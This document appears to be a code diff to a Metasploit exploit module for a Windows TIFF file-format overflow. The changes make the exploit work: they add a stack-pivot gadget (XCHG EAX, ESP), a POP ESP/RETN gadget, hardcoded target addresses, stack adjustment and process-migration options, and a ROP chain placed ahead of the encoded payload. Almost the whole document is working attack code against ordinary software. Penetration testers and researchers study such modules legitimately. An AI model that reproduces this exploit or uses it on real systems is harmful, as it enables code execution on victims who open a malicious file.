Working version

modules/exploits/windows/fileformat/mswin_tiff_overflow.rb

@@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'BadChars' => "\x00"
+          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff",   # add esp, -80000; popad; popfd
+          'StackAdjustment' => -3500,
+          'BadChars'        => "\x00"
         },
       'DefaultOptions'  =>
         {
-          'ExitFunction' => "process"
+          'ExitFunction' => "process",
+          'PrependMigrate' => true
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Gain control of the call [eax+50h] instruction
-    buf[0x4874, 4] = [0x41424344-0x50].pack('V')
+    # XCHG EAX, ESP; RETN msvcrt
+    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
 
     buf
   end
@@ -147,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote
     # Target address (200F0700):
     # 0:000> dd  200f06fc L4
     # 200f06fc  ffffffff 36643ab8 d9c0d946 5af42474
-    p      = generate_rop_payload('msvcrt','',{'target'=>'xp'})
-    p     << payload.encoded
+    p = ''
+    p << [0x77c15ed5].pack('V') # XCHG EAX, ESP  msvcrt
+    p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
+    p << payload.encoded
     block  = p
     block << "B" * (1024 - p.length)
 
@@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0x00000002].pack('V')
     mscd << [0x00000003].pack('V')
     mscd << [0xfffffffe].pack('V')
-    mscd << [0xffffffff].pack('V') * 52
+    mscd << [0xffffffff].pack('V') * 32 #52
+    mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
+    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 
     mscd